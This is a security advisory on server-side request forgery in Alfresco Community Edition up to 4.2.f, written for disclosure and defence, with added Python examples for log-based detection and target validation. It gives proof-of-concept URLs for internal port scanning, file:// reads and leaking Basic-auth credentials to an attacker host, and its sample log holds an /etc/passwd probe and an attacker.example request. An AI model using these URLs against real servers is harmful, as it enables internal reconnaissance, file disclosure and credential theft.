Multiple SSRF vulnerabilities in Alfresco Community Edition

SEC Consult Vulnerability Lab Security Advisory < 20140716-0 >
=======================================================================
title: Multiple SSRF vulnerabilities
product: Alfresco Community Edition
vulnerable version: <=4.2.f
fixed version: 5.0.a
impact: High
homepage: www.alfresco.com
found: 2014-05-15
by: V. Paulikas
    SEC Consult Vulnerability Lab
=======================================================================

Vendor description:
-------------------
"Alfresco Community Edition allows organizations to manage any type of content
from simple office documents to scanned images, photographs, engineering drawings
and large video files. It is commonly used as a document management system,
content platform, CMIS-compliant repository."

www.alfresco.com/products/community


Business recommendation:
------------------------
Multiple SSRF vulnerabilities were identified within the affected Alfresco product.

By exploiting these vulnerabilities an unauthenticated attacker is able to
scan available ports on internal systems and access internal web applications
which should not be accessible from the Internet.

It is recommended to restrict access to the affected servlets until an
official patch is released by the vendor.


Vulnerability overview/description:
-----------------------------------
1) Server Side Request Forgery (SSRF)

A Server Side Request Forgery vulnerability allows an attacker to issue remote
connections on behalf of the affected server. This can be exploited in order to
reach internal systems, which are not reachable from the Internet, or to bypass
access restrictions.


Proof of concept:
-----------------
SSRF PoC 1)
An unauthenticated user can access the proxy servlet and perform internal
system port scanning by accessing the URL provided below:

http://host/alfresco/proxy?endpoint=http://internal_system:port

The server responds with an error message "Connection refused" when the port
is not accessible (firewalled or not available). Other error messages indicate
a service running on the port which is being probed.

The proxy servlet implementation in older versions of the Alfresco Community Edition
supports the file:// URI scheme, allowing the attacker to disclose the contents of files
on the affected server.



SSRF PoC 2)
The Content Management Interoperability Services (CMIS) browser servlet can also be
exploited by an unauthenticated attacker in order to issue internal connections. The
following URL can be used in order to exploit the vulnerability:

http://host/alfresco/cmisbrowser?url=http://internal_system:port

The server responds with similar error messages when the port is open or closed.

If the victim is tricked into accessing a resource protected with Basic authentication
on the affected host via the cmisbrowser servlet, further requests include the submitted
credentials and can be intercepted by an attacker. An example of such a scenario:

- the victim accesses http://host/alfresco/cmisbrowser?url=http://host/alfresco/service/
  and supplies his user credentials.
- the victim then accesses http://host/alfresco/cmisbrowser?url=http://attacker_host and
  his base64-encoded credentials are leaked.
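Log-based detection for both PoCs above, added here as an example and not part of the original advisory or of Alfresco's code. It parses access-log lines in Tomcat/Apache combined format, extracts the `endpoint` parameter of /alfresco/proxy and the `url` parameter of /alfresco/cmisbrowser, and flags targets that use a non-http scheme (the file:// case), point at loopback or private addresses, or probe non-standard ports; a per-source count of distinct probed ports surfaces the port-scan pattern. Every log line, source address and host name in `SAMPLE_LOG` is constructed for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (combined log format). They are not
# taken from the advisory or from any real system.
SAMPLE_LOG = """\
10.0.0.5 - - [15/May/2014:10:01:02 +0200] "GET /alfresco/proxy?endpoint=http://10.0.0.20:8080 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.5 - - [15/May/2014:10:01:03 +0200] "GET /alfresco/proxy?endpoint=http://10.0.0.20:22 HTTP/1.1" 500 290 "-" "Mozilla/5.0"
10.0.0.5 - - [15/May/2014:10:01:09 +0200] "GET /alfresco/proxy?endpoint=file:///etc/passwd HTTP/1.1" 200 1820 "-" "Mozilla/5.0"
10.0.0.5 - - [15/May/2014:10:02:11 +0200] "GET /alfresco/cmisbrowser?url=http%3A%2F%2F127.0.0.1%3A8443 HTTP/1.1" 500 280 "-" "Mozilla/5.0"
192.0.2.44 - - [15/May/2014:10:03:00 +0200] "GET /alfresco/cmisbrowser?url=http://attacker.example/ HTTP/1.1" 200 512 "-" "curl/7.30"
10.0.0.7 - - [15/May/2014:10:04:00 +0200] "GET /alfresco/service/api/login HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The two servlets named in the advisory and the query parameter each one
# forwards the server-side request to.
SERVLET_PARAM = {
    "/alfresco/proxy": "endpoint",
    "/alfresco/cmisbrowser": "url",
}


def classify_target(url):
    """Return the reasons a proxied target looks like an SSRF probe (empty list if none)."""
    reasons = []
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ("http", "https"):
        reasons.append(f"non-http scheme {parsed.scheme or '<none>'}")
    host = parsed.hostname or ""
    try:
        addr = ipaddress.ip_address(host)
        if addr.is_loopback or addr.is_private or addr.is_link_local:
            reasons.append(f"internal address {host}")
    except ValueError:
        # Not an IP literal. "localhost" and single-label names only resolve
        # inside the network, so treat them as internal (no DNS lookup here).
        if host == "localhost" or ("." not in host and host):
            reasons.append(f"internal hostname {host}")
    try:
        port = parsed.port
    except ValueError:
        port = None
    if port not in (None, 80, 443):
        reasons.append(f"non-standard port {port}")
    return reasons


def find_ssrf_attempts(log_text):
    """Parse combined-format log lines; return one finding per request to the affected servlets."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        req = urlparse(m.group("target"))
        param = SERVLET_PARAM.get(req.path)
        if param is None:
            continue
        for target in parse_qs(req.query).get(param, []):
            reasons = classify_target(target)
            if not reasons:
                # External http(s) target on a default port: still recorded,
                # because the credential-leak scenario proxies to an
                # attacker-controlled host.
                reasons = [f"external target via {req.path}"]
            findings.append({
                "src": m.group("src"),
                "servlet": req.path,
                "target": target,
                "status": int(m.group("status")),
                "reasons": reasons,
            })
    return findings


def port_scan_sources(findings, min_ports=2):
    """Return source IPs that probed at least `min_ports` distinct target ports through the servlets."""
    ports_by_src = {}
    for f in findings:
        try:
            port = urlparse(f["target"]).port
        except ValueError:
            continue
        if port is not None:
            ports_by_src.setdefault(f["src"], set()).add(port)
    return {src for src, ports in ports_by_src.items() if len(ports) >= min_ports}


if __name__ == "__main__":
    hits = find_ssrf_attempts(SAMPLE_LOG)
    for h in hits:
        print(f"{h['src']} -> {h['servlet']} {h['target']}: {'; '.join(h['reasons'])}")
    print("port-scan candidates:", sorted(port_scan_sources(hits)))
```

Any request to these two servlets from an unauthenticated client is worth alerting on while a vulnerable version is deployed; the classification above only orders the findings by how clearly the target points inside the network.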

 

 

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the Alfresco Community
Edition version 4.2.f, which was the most recent version at the time of
discovery.

The version 2.9.0B was verified to support the file:// URI scheme,
allowing attackers to disclose the contents of local files on the affected
server.


Vendor contact log:
-------------------
2014-05-30: Contacting vendor through support@alfresco.com - no response.
2014-06-02: Contacting vendor through online form at www.alfresco.com/company/contact
            - no response.
2014-06-09: Contacting vendor through support@alfresco.com and online form - no response.
2014-06-16: Contacting vendor through support@alfresco.com and online form.
2014-06-17: Response from the vendor.
2014-06-24: Advisory sent to the vendor.
2014-07-07: Vendor acknowledges that a new version (5.0.a) of the Alfresco CMS
            is available.
2014-07-16: SEC Consult releases security advisory.


Solution:
---------
According to the vendor, the new version 5.0.a fixes the identified problems.
The new version can be downloaded from their website.

However, by inspecting the updated version of the Alfresco CMS it was identified
that only the /proxy endpoint was properly fixed. The /cmisbrowser servlet is only
commented out in web.xml in default installations; once enabled, it can be exploited
by unauthenticated attackers as described above.
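Because the /cmisbrowser servlet is not hardened in 5.0.a, an operator who re-enables it, or who cannot upgrade, needs a request-level check in front of both servlets. The validator below is an added example: it is not Alfresco's code and not the fix shipped in 5.0.a. It accepts only http/https, a host allowlist and default ports, and rejects targets whose name resolves into an internal range, which covers the port-scan, file:// and attacker-host cases from the PoCs. `ALLOWED_HOSTS`, `FAKE_DNS` and `fake_resolver` are constructed for the example so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Address ranges a proxy servlet must never be allowed to reach. Listed
# explicitly (rather than relying on ipaddress.is_private) so the policy
# can be reviewed line by line.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
# Hypothetical allowlist for this deployment (constructed for the example).
ALLOWED_HOSTS = {"www.alfresco.com"}


def is_internal_address(addr):
    """True if `addr` (an IP literal) falls in one of the blocked ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in BLOCKED_NETWORKS)


def validate_proxy_target(url, allowed_hosts=ALLOWED_HOSTS, resolver=socket.gethostbyname):
    """Decide whether a user-supplied endpoint/url value may be fetched server-side.

    Returns (True, resolved_ip) when the target passes, or (False, reason) when
    it is rejected. `resolver` is injectable so the check can run without DNS.
    """
    try:
        parsed = urlparse(url)
        port = parsed.port
    except ValueError:
        return False, "malformed url"
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"            # rejects file://, gopher://, ...
    host = parsed.hostname
    if not host:
        return False, "missing host"
    if host.lower() not in allowed_hosts:
        return False, "host not on allowlist"         # rejects internal_system, localhost, IP literals
    if port not in (None, *ALLOWED_PORTS):
        return False, "port not allowed"              # stops port scanning of an allowed host
    try:
        addr = resolver(host)
    except OSError:
        return False, "unresolvable host"
    if is_internal_address(addr):
        return False, "resolves to internal address"  # allowlisted name pointing inside
    return True, addr


# Constructed stand-in for DNS so the example runs offline.
FAKE_DNS = {"www.alfresco.com": "198.51.100.10", "intranet.example": "10.0.0.20"}


def fake_resolver(host):
    """Constructed resolver: behaves like gethostbyname for the names in FAKE_DNS."""
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(f"constructed resolver: unknown host {host}")


if __name__ == "__main__":
    for candidate in (
        "http://www.alfresco.com/",
        "http://internal_system:8080",
        "file:///etc/passwd",
        "http://www.alfresco.com:22/",
    ):
        print(candidate, "->", validate_proxy_target(candidate, resolver=fake_resolver))
    print("allowlisted name resolving inside ->",
          validate_proxy_target("http://intranet.example/",
                                allowed_hosts={"intranet.example"}, resolver=fake_resolver))
```

The resolved address returned on success is the one the outbound connection should be made to; re-resolving the name at connect time would reopen the check to DNS rebinding. In a servlet container the natural place for this check is a filter mapped to both /proxy and /cmisbrowser, combined with the access restriction recommended above.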

Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF V. Paulikas / @2014